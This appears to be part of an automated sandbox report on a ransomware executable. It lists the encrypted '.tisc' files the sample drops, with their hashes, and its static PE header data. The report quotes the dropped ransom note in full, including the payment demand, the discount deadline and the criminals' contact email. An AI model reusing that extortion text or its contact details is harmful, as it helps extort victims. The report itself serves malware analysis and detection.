                                                                                    Preview: !.$m.Sn...".aK......\.(.=.spXO.......h....Lh.x,[.j..T.>l...c.........\:'9...j....Qa.....H6.;,.......Qi.3[.....s.$..`....T.[.W..C..9..2T.@.R.:.u....E?2.."\...6Xv..W{}.#..\.spX..c...K.%Vr..h.\2C...>.&P@...........7...K..K./..|.2.y0n.G.v3.P...rtW<.9..3k>&i...N.4...e...TI.:...&+.D...i.VP.b.vC.......p.)..b.....c..s..,.]....Y|_O6..K.[0..R...aN9cBvsGMXusve1sBoUrEE1q7fttlXX9WCZBkEkw{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                    C:\Users\user\Favorites\Google.url
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):440
                                                                                    Entropy (8bit):7.4037460082936315
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:mYwpSJ3b5QAyejG9NzLSxPEyX3dg5GdNX3GPIcii9a:mYESJr5QDeANzmxp9jdNXWgbD
                                                                                    MD5:ED3B155117D9C06E842A43FA47527893
                                                                                    SHA1:02386E8CA8153B54C23CBEC80D98618557EE5F1F
                                                                                    SHA-256:7D6F72AD4BC7E5478C0D07F39E250CE36693811DA92D8ACE145EC37063881DF8
                                                                                    SHA-512:511F3B50F92B5E75E1E62BA83C210A5BD4189750DE6C7C4BA362B97F82B00EA7BD1A34A0A71860EEFFB782EEB9E42AFEE79BF3613347D32D8100494836AC20C4
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ...3....?.@.OV.yS.1.G6.......:mb.......4...9H.UD&..g+..&.D..17y.A.MK.........]C..t..J..D...R.)+]..M~.X%.....N.66...0....,...n.....<.Q.Uw.c~.MO...hf..tN..k.0.`8.,..{.g..w...+jc7..|h..N...........>T.|..2_...X..*.../P.(-..EA...6...d...;.T..W... .f.N....<...fr.=..T..).1.M2yP.f....G.Rt...V..{...W.7....gJ)..IO..H|...D...V.5'.y...(...6)o.s.C#.Ff......'...//aN9cBvsGMXusve1sBoUrEE1q7fttlXX9WCZBkEkw{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                    C:\Users\user\Favorites\Google.url.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):440
                                                                                    Entropy (8bit):7.4037460082936315
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:mYwpSJ3b5QAyejG9NzLSxPEyX3dg5GdNX3GPIcii9a:mYESJr5QDeANzmxp9jdNXWgbD
                                                                                    MD5:ED3B155117D9C06E842A43FA47527893
                                                                                    SHA1:02386E8CA8153B54C23CBEC80D98618557EE5F1F
                                                                                    SHA-256:7D6F72AD4BC7E5478C0D07F39E250CE36693811DA92D8ACE145EC37063881DF8
                                                                                    SHA-512:511F3B50F92B5E75E1E62BA83C210A5BD4189750DE6C7C4BA362B97F82B00EA7BD1A34A0A71860EEFFB782EEB9E42AFEE79BF3613347D32D8100494836AC20C4
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ...3....?.@.OV.yS.1.G6.......:mb.......4...9H.UD&..g+..&.D..17y.A.MK.........]C..t..J..D...R.)+]..M~.X%.....N.66...0....,...n.....<.Q.Uw.c~.MO...hf..tN..k.0.`8.,..{.g..w...+jc7..|h..N...........>T.|..2_...X..*.../P.(-..EA...6...d...;.T..W... .f.N....<...fr.=..T..).1.M2yP.f....G.Rt...V..{...W.7....gJ)..IO..H|...D...V.5'.y...(...6)o.s.C#.Ff......'...//aN9cBvsGMXusve1sBoUrEE1q7fttlXX9WCZBkEkw{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                    C:\Users\user\Favorites\Live.url
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):438
                                                                                    Entropy (8bit):7.4227076172394035
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:aSD5u3Z5wUMX+xOXKekdAKV9xhXhEdBy0LsDJqaPIcii9a:aSD5GEUI+xTd9DxhxWrsDJqagbD
                                                                                    MD5:FB770C0C612EF5A5D928392E1C21C504
                                                                                    SHA1:A81582C459B1AABD82ACB4B286B2363DF12023E0
                                                                                    SHA-256:43FAFF46BBCD785C048264571061BC14D290450E0FC54841FB49A9255A717382
                                                                                    SHA-512:1F3220A94D1AF16700D59D54619C39970852B1BC41B01D1C619C10904BC28BABAB00D0C1D9FB2BD1F78E439AE66E1778AFDB1D4DF4FDB30690AD77D6EC0D2415
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: +.~V8_[..c..A.=.4oi.FM..*f..3.jK?.]...........ZQ.f2..F...F..6._.EQ1i...A.U~?.c&A...(.s.M.<.L9CR...O.....}&O+.{.....0......p.+.3.c#......Q.R..y+.../k~Tm.).......Ka..._^..uP#c..q.~....>..M@k.\......U]...~...Fs?..0~.V..%}.W..2XR..).%..v....Z..7.......~^8H.....L...............B`.W.M..Z..mn.D.._........."7e._}...........&..J...]..k.....z....*,...aN9cBvsGMXusve1sBoUrEE1q7fttlXX9WCZBkEkw{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                    C:\Users\user\Favorites\Live.url.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):438
                                                                                    Entropy (8bit):7.4227076172394035
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:aSD5u3Z5wUMX+xOXKekdAKV9xhXhEdBy0LsDJqaPIcii9a:aSD5GEUI+xTd9DxhxWrsDJqagbD
                                                                                    MD5:FB770C0C612EF5A5D928392E1C21C504
                                                                                    SHA1:A81582C459B1AABD82ACB4B286B2363DF12023E0
                                                                                    SHA-256:43FAFF46BBCD785C048264571061BC14D290450E0FC54841FB49A9255A717382
                                                                                    SHA-512:1F3220A94D1AF16700D59D54619C39970852B1BC41B01D1C619C10904BC28BABAB00D0C1D9FB2BD1F78E439AE66E1778AFDB1D4DF4FDB30690AD77D6EC0D2415
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: +.~V8_[..c..A.=.4oi.FM..*f..3.jK?.]...........ZQ.f2..F...F..6._.EQ1i...A.U~?.c&A...(.s.M.<.L9CR...O.....}&O+.{.....0......p.+.3.c#......Q.R..y+.../k~Tm.).......Ka..._^..uP#c..q.~....>..M@k.\......U]...~...Fs?..0~.V..%}.W..2XR..).%..v....Z..7.......~^8H.....L...............B`.W.M..Z..mn.D.._........."7e._}...........&..J...]..k.....z....*,...aN9cBvsGMXusve1sBoUrEE1q7fttlXX9WCZBkEkw{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                    C:\Users\user\Favorites\NYTimes.url
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):441
                                                                                    Entropy (8bit):7.468538064656987
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:96795HCfaiX+IVMFJIyfFl1sVLUONH3/PIcii9a:96795ifaiX+IeFyI1sxPgbD
                                                                                    MD5:F24C4E857FED54D30691DC0D28B85FE2
                                                                                    SHA1:6716347D266E876766B9B8A76562D128F5CF4DF6
                                                                                    SHA-256:1326607691382FF6701444D925C8CE18D50BF01EA5C36430B5FC56474C00B8AF
                                                                                    SHA-512:7896C219C35DC75A645B50E0E46313C397D91DD1E73F40FCA62AAA7449FBC517145A4D932B68D14F6A5AA074A98C3884B5FE1DB15241B531F6A120386DE3004E
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: K.%....H.L...]..r..q?6`G.$...+..tB...=.:..y.....8."c..;...E......}...FI<B.`..w.0~.t..~O.w..c.7.f..<....q.@+3.J.ul.6. sd......7.u\.c..Kh..1........I....D,..:...R.+...~.k..u....Y9....s;Xu...j..~u.....\..ngp...4z....R...'.4Sj.......%QY.|=.2l....d.......`....7. ......]C......Q..~..!m....'.O....L......>.{j.......t.d... ..~....L>.I.c....+.....km..<aN9cBvsGMXusve1sBoUrEE1q7fttlXX9WCZBkEkw{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                    C:\Users\user\Favorites\NYTimes.url.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):441
                                                                                    Entropy (8bit):7.468538064656987
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:96795HCfaiX+IVMFJIyfFl1sVLUONH3/PIcii9a:96795ifaiX+IeFyI1sxPgbD
                                                                                    MD5:F24C4E857FED54D30691DC0D28B85FE2
                                                                                    SHA1:6716347D266E876766B9B8A76562D128F5CF4DF6
                                                                                    SHA-256:1326607691382FF6701444D925C8CE18D50BF01EA5C36430B5FC56474C00B8AF
                                                                                    SHA-512:7896C219C35DC75A645B50E0E46313C397D91DD1E73F40FCA62AAA7449FBC517145A4D932B68D14F6A5AA074A98C3884B5FE1DB15241B531F6A120386DE3004E
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: K.%....H.L...]..r..q?6`G.$...+..tB...=.:..y.....8."c..;...E......}...FI<B.`..w.0~.t..~O.w..c.7.f..<....q.@+3.J.ul.6. sd......7.u\.c..Kh..1........I....D,..:...R.+...~.k..u....Y9....s;Xu...j..~u.....\..ngp...4z....R...'.4Sj.......%QY.|=.2l....d.......`....7. ......]C......Q..~..!m....'.O....L......>.{j.......t.d... ..~....L>.I.c....+.....km..<aN9cBvsGMXusve1sBoUrEE1q7fttlXX9WCZBkEkw{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                    C:\Users\user\Favorites\Reddit.url
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):440
                                                                                    Entropy (8bit):7.427603133456812
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:+2KuB+OZldlk6oo/XT0Lg7aqlp7DPIcii9a:+luBzl3HP/T0LmllgbD
                                                                                    MD5:CF6D529AC944F756D47C54A3BAD990C0
                                                                                    SHA1:84969D840281B3850D6140D4146022750C323148
                                                                                    SHA-256:79675BC243E079B1537556A4551C675CEA5A81E72BAF6AB3C9F921A0206D0DD6
                                                                                    SHA-512:12FFCEEC7C53B597063E4053831665C0EFADEE73CADB1F02B7ED6B7F0850A17B6EE97AD25F97159F3103259276A3997C04768CFF99E9FA32E425B5DBBEBBE007
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: .*.{...6P..szf|.....x./....K&.O...*.>..^...]...!^z.._.....b...2Z]......Kf...k}E.4...........@.;..u{...rV.1[..n...m.....\..o...|+.4.6.D.~.1.. .<.C.$)..8..#...;..%.P.x...S=B..E..0..OaZ...a.....]B..t...*.3.B...T5E.uX.z.r.....z...,_iC.H9.@.~wV..m.4.?l.h$.u.l@..t.<..)A...Y&#.k..uH..v...3W....xEi.....#.#.......d;.b.R#A..Q.98Kf..L;Y..H.T8..Yx4_@aN9cBvsGMXusve1sBoUrEE1q7fttlXX9WCZBkEkw{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                    C:\Users\user\Favorites\Reddit.url.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):440
                                                                                    Entropy (8bit):7.427603133456812
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:+2KuB+OZldlk6oo/XT0Lg7aqlp7DPIcii9a:+luBzl3HP/T0LmllgbD
                                                                                    MD5:CF6D529AC944F756D47C54A3BAD990C0
                                                                                    SHA1:84969D840281B3850D6140D4146022750C323148
                                                                                    SHA-256:79675BC243E079B1537556A4551C675CEA5A81E72BAF6AB3C9F921A0206D0DD6
                                                                                    SHA-512:12FFCEEC7C53B597063E4053831665C0EFADEE73CADB1F02B7ED6B7F0850A17B6EE97AD25F97159F3103259276A3997C04768CFF99E9FA32E425B5DBBEBBE007
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: .*.{...6P..szf|.....x./....K&.O...*.>..^...]...!^z.._.....b...2Z]......Kf...k}E.4...........@.;..u{...rV.1[..n...m.....\..o...|+.4.6.D.~.1.. .<.C.$)..8..#...;..%.P.x...S=B..E..0..OaZ...a.....]B..t...*.3.B...T5E.uX.z.r.....z...,_iC.H9.@.~wV..m.4.?l.h$.u.l@..t.<..)A...Y&#.k..uH..v...3W....xEi.....#.#.......d;.b.R#A..Q.98Kf..L;Y..H.T8..Yx4_@aN9cBvsGMXusve1sBoUrEE1q7fttlXX9WCZBkEkw{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                    C:\Users\user\Favorites\Twitter.url
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):441
                                                                                    Entropy (8bit):7.485502235842256
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:pL9FvnHwe1orna6kMiYf3i9gPF9PIcii9a:pBJHwe1ornDkMiYKybgbD
                                                                                    MD5:46871B76F65E69569C97F9DB64240B7A
                                                                                    SHA1:B568342DA82E683BAF8B68D30389A95684C13A68
                                                                                    SHA-256:7D3DAA0A0B4803648513D370AB6A7D392AE933C0DE4A64A713717EAF6B630BD4
                                                                                    SHA-512:19F19586C9E5DBCAC51A40000B7CC8BA07A5A33549ED39A7B0C74EAB60F749B80FC1913B64021B72A0A2329BA0C47D6164F1C0EEEC9849614C6F6324A1BC19AC
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: .(.a./RV.......W......;....:..P..Dw..e...1(..H.6.......R,.vc....^.AQkR........Y4....%.. ...\$D.N..u\y.-T....2.B.u...;h..[..0AYZ....m..._4t.K+...]...].[....%.....o[a^...rf..H.?._.......'...f..+.I.zh.....M.....ib.....>..".v..z....OE.X...p.l....s..~.....3.Y%m.%-...>'...U.V..aC.-.K...........4`..H...[g}O.h.\..|Ogs.w..k....?G..Z....q.........(_UaN9cBvsGMXusve1sBoUrEE1q7fttlXX9WCZBkEkw{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                    C:\Users\user\Favorites\Twitter.url.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):441
                                                                                    Entropy (8bit):7.485502235842256
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:pL9FvnHwe1orna6kMiYf3i9gPF9PIcii9a:pBJHwe1ornDkMiYKybgbD
                                                                                    MD5:46871B76F65E69569C97F9DB64240B7A
                                                                                    SHA1:B568342DA82E683BAF8B68D30389A95684C13A68
                                                                                    SHA-256:7D3DAA0A0B4803648513D370AB6A7D392AE933C0DE4A64A713717EAF6B630BD4
                                                                                    SHA-512:19F19586C9E5DBCAC51A40000B7CC8BA07A5A33549ED39A7B0C74EAB60F749B80FC1913B64021B72A0A2329BA0C47D6164F1C0EEEC9849614C6F6324A1BC19AC
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: .(.a./RV.......W......;....:..P..Dw..e...1(..H.6.......R,.vc....^.AQkR........Y4....%.. ...\$D.N..u\y.-T....2.B.u...;h..[..0AYZ....m..._4t.K+...]...].[....%.....o[a^...rf..H.?._.......'...f..+.I.zh.....M.....ib.....>..".v..z....OE.X...p.l....s..~.....3.Y%m.%-...>'...U.V..aC.-.K...........4`..H...[g}O.h.\..|Ogs.w..k....?G..Z....q.........(_UaN9cBvsGMXusve1sBoUrEE1q7fttlXX9WCZBkEkw{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                    C:\Users\user\Favorites\Wikipedia.url
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):443
                                                                                    Entropy (8bit):7.471459933747362
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:zXXS0yAGEgFzW8u9APclRkkyybsrA/PIcii9a:7C0uzW8u9A5EsrA/gbD
                                                                                    MD5:F5C305A59D9E7B4085575475CC5DE01B
                                                                                    SHA1:0036400E781749B015304D92B6B15029F1AE4EFF
                                                                                    SHA-256:D45AF6149F28DF25C8268B203D238B06152466D43F5A09FCD1B84AA295AB4B1E
                                                                                    SHA-512:454221CF9B7299AAB0DDB6A26D3BEFD5639F95EC06C327A78387FA1BF4F5C77EA9C65CF5F28B77B448C1095D1F1C6FDBFB480933683E1DD488B5BC695E331993
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: s.N;.e..m.*.i..Z.....;Dd2..w:......X..L~.~h#.#.......f....X......T.$. .t.."W.c..6O.`##..%..E.yb...]X.t.8...bW.h....`..O.M.......6..oR?..I.'..d..B=.f.xh.C.NZ..6\.......B..........*K........i3...}.&.zV.*...;.?./.r./..s7x..Iu.b...L.'....?t.~=..H...!......5...\....u...!...hd% .....d7.....y.1...%\.....+#..<E0.>w(y.I.0z.u`.pX.%L...K.&'..U..:.GG..$.E=aN9cBvsGMXusve1sBoUrEE1q7fttlXX9WCZBkEkw{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                    C:\Users\user\Favorites\Wikipedia.url.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):443
                                                                                    Entropy (8bit):7.471459933747362
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:zXXS0yAGEgFzW8u9APclRkkyybsrA/PIcii9a:7C0uzW8u9A5EsrA/gbD
                                                                                    MD5:F5C305A59D9E7B4085575475CC5DE01B
                                                                                    SHA1:0036400E781749B015304D92B6B15029F1AE4EFF
                                                                                    SHA-256:D45AF6149F28DF25C8268B203D238B06152466D43F5A09FCD1B84AA295AB4B1E
                                                                                    SHA-512:454221CF9B7299AAB0DDB6A26D3BEFD5639F95EC06C327A78387FA1BF4F5C77EA9C65CF5F28B77B448C1095D1F1C6FDBFB480933683E1DD488B5BC695E331993
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: s.N;.e..m.*.i..Z.....;Dd2..w:......X..L~.~h#.#.......f....X......T.$. .t.."W.c..6O.`##..%..E.yb...]X.t.8...bW.h....`..O.M.......6..oR?..I.'..d..B=.f.xh.C.NZ..6\.......B..........*K........i3...}.&.zV.*...;.?./.r./..s7x..Iu.b...L.'....?t.~=..H...!......5...\....u...!...hd% .....d7.....y.1...%\.....+#..<E0.>w(y.I.0z.u`.pX.%L...K.&'..U..:.GG..$.E=aN9cBvsGMXusve1sBoUrEE1q7fttlXX9WCZBkEkw{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                    C:\Users\user\Favorites\Youtube.url
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):441
                                                                                    Entropy (8bit):7.410070362550913
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:yEeB/REanYtB4l47syiXtj2YPxusgDTA8UgKZf8ktk6i18XwZ4AIxopob9LDjHSn:E/8tU4YXg+4Ditk6RXs4AIPIcii9a
                                                                                    MD5:608ADD1249ACE586E32034256DC519E8
                                                                                    SHA1:25DB933F24174F50B0A4FA686BC82B063E848915
                                                                                    SHA-256:429C6A7252B5AC1B158D4273BF4D5FFE0F91615FBA31B7057389F838918C9A12
                                                                                    SHA-512:E83E314D7BAC97B52E47F2E902E8BC8B3BCC16E892E2C5C833EDEB577BB018B6FDD93E04A794649AF829255442F755F7A352119C51F607CF36EEA8F6CA05C58F
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: er./r..,.=.(..s.f......]C.....%..<+....M..d...?..6.X.H.f.(|B....N...f.#...DKXI..fm..R.,.:^.....:@..2.....A...3O.9.]..|..]:....4B..9.S..;.`P.W.u.:.JY...~.......*+..............._.K>w.\...|!$#..&..3? }.Z$cW".......c...~;R.H..ito..D.E|.H .kl0......f..$W.p2U.V.H..F.MI.c..{g....`.u.dS../f.j..w.K..GP...p T.@]E.......f.......<.Oo.Ag.."C.fVp.j.....aN9cBvsGMXusve1sBoUrEE1q7fttlXX9WCZBkEkw{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                    C:\Users\user\Favorites\Youtube.url.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):441
                                                                                    Entropy (8bit):7.410070362550913
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:yEeB/REanYtB4l47syiXtj2YPxusgDTA8UgKZf8ktk6i18XwZ4AIxopob9LDjHSn:E/8tU4YXg+4Ditk6RXs4AIPIcii9a
                                                                                    MD5:608ADD1249ACE586E32034256DC519E8
                                                                                    SHA1:25DB933F24174F50B0A4FA686BC82B063E848915
                                                                                    SHA-256:429C6A7252B5AC1B158D4273BF4D5FFE0F91615FBA31B7057389F838918C9A12
                                                                                    SHA-512:E83E314D7BAC97B52E47F2E902E8BC8B3BCC16E892E2C5C833EDEB577BB018B6FDD93E04A794649AF829255442F755F7A352119C51F607CF36EEA8F6CA05C58F
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: er./r..,.=.(..s.f......]C.....%..<+....M..d...?..6.X.H.f.(|B....N...f.#...DKXI..fm..R.,.:^.....:@..2.....A...3O.9.]..|..]:....4B..9.S..;.`P.W.u.:.JY...~.......*+..............._.K>w.\...|!$#..&..3? }.Z$cW".......c...~;R.H..ito..D.E|.H .kl0......f..$W.p2U.V.H..F.MI.c..{g....`.u.dS../f.j..w.K..GP...p T.@]E.......f.......<.Oo.Ag.."C.fVp.j.....aN9cBvsGMXusve1sBoUrEE1q7fttlXX9WCZBkEkw{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                    C:\Users\user\_readme.txt
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):1110
                                                                                    Entropy (8bit):4.877671780222618
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:FS5ZHPnIekFQjhRe9bgnYLuW2mFRqrl3W4kA+GT/kF5M2/k/rAXTJhy:WZHfv0p6W2PFWrDGT0f/k/4u
                                                                                    MD5:63EC47014492996F7809A1D7CC88DD90
                                                                                    SHA1:C6F22DD4060A48F26ED971CAFABA6A2E296D2D88
                                                                                    SHA-256:371EED226E88A1C1E4A129581F873F72A0BDC68985EB38A07353A7201113D276
                                                                                    SHA-512:2299D7814D0A2772DE23DBABF16D45A35D40174429F0B756CE1F3E56869F20BDA4BC708F51905CC72FE8F96CDC37E969E07C2BAA14A2990E4CF16121BE346281
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...You can get and look video overview decrypt tool:..https://we.tl/t-1JwFK5rT39..Price of private key and decrypt software is $980...Discount 50% available if you contact us first 72 hours, that's price for you is $490...Please note that you'll never restore your data without payment...Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.......To get this software you need write on our e-mail:..manager@mailtemp.ch....Reserve e-mail address to
                                                                                    C:\bootTel.dat
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):409
                                                                                    Entropy (8bit):7.3786592410400305
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:9OccLPC6kyx2acoXJBnTnHmBN3MvPIcii9a:scePCm2tqPTGB9MvgbD
                                                                                    MD5:E0F95BDAD744C3998FDCB112804EA5C1
                                                                                    SHA1:A905E1CC463018A48683F7141BD4BB3F5C3C7ADE
                                                                                    SHA-256:391EF1D2DD9A765776DF777A554613B00562579B13CF14ED146315059F0D21BE
                                                                                    SHA-512:089A735EE945B708E1BB6053ECFFBEF61ED31AC11D28C1BA04977C020FF59BF269658FE0FB14F2AF3975F3054CE9CCFF77ED730FD3FCFC1C4A4E580AC7C4B320
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: .%....^.m.E........9....4t..Ix.-..j..\2......o..f.%..{....9.#.e+3vQRN.WE.9.>.......@.~.;.y.v._...h.}]..>...@eS..=.O.bJ.q......m..t..\.$.'.`.c|..P..[.....L#..X......R-.F.o.,".L.q.P...l...{.......T..a.#.r.......a..q.&...6.A..Yk`G4?T.|.....-.....h....s.4.=.....x.P........m....!.^...|.......32ht..|,!<\...'........KM.....i..aN9cBvsGMXusve1sBoUrEE1q7fttlXX9WCZBkEkw{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                    C:\bootTel.dat.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):409
                                                                                    Entropy (8bit):7.3786592410400305
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:9OccLPC6kyx2acoXJBnTnHmBN3MvPIcii9a:scePCm2tqPTGB9MvgbD
                                                                                    MD5:E0F95BDAD744C3998FDCB112804EA5C1
                                                                                    SHA1:A905E1CC463018A48683F7141BD4BB3F5C3C7ADE
                                                                                    SHA-256:391EF1D2DD9A765776DF777A554613B00562579B13CF14ED146315059F0D21BE
                                                                                    SHA-512:089A735EE945B708E1BB6053ECFFBEF61ED31AC11D28C1BA04977C020FF59BF269658FE0FB14F2AF3975F3054CE9CCFF77ED730FD3FCFC1C4A4E580AC7C4B320
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: .%....^.m.E........9....4t..Ix.-..j..\2......o..f.%..{....9.#.e+3vQRN.WE.9.>.......@.~.;.y.v._...h.}]..>...@eS..=.O.bJ.q......m..t..\.$.'.`.c|..P..[.....L#..X......R-.F.o.,".L.q.P...l...{.......T..a.#.r.......a..q.&...6.A..Yk`G4?T.|.....-.....h....s.4.=.....x.P........m....!.^...|.......32ht..|,!<\...'........KM.....i..aN9cBvsGMXusve1sBoUrEE1q7fttlXX9WCZBkEkw{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                    Static File Info

                                                                                    General

                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Entropy (8bit):7.776107857840815
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) a (10002005/4) 99.53%
                                                                                    • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                                                                    • Clipper DOS Executable (2020/12) 0.02%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                    File name:NZPC0PFaC0.exe
                                                                                    File size:833536
                                                                                    MD5:550b59b69ebfd6dda6b55725245b46ad
                                                                                    SHA1:f6a71793288cc09397b262fba8fc38b29073a44e
                                                                                    SHA256:0d977e55742460c71884d6040178fc8c7abf8c97136b6293da37cbf9c59b6778
                                                                                    SHA512:eced75d02b832bf68657835f1ef194ac39c04a806951f2d48f33ab5722804fdc0a8530507761c1dc0e2696d6dc8523a60541895e44eac3b886c288ccc4f21a45
                                                                                    SSDEEP:12288:KxrffFxEHP0VOTfvvQfDDkuM5glE15y4EXJUnrAtHbVzxp6L:K19xw0V6n4LLM5glE15HcJoABd36L
                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................PE..L...2.W_...........

                                                                                    File Icon

                                                                                    Icon Hash:b4fc36b6b694c6e2

                                                                                    Static PE Info

                                                                                    General

                                                                                    Entrypoint:0x4046b3
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:false
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                                                                                    DLL Characteristics:TERMINAL_SERVER_AWARE, NX_COMPAT
                                                                                    Time Stamp:0x5F579332 [Tue Sep 8 14:20:34 2020 UTC]
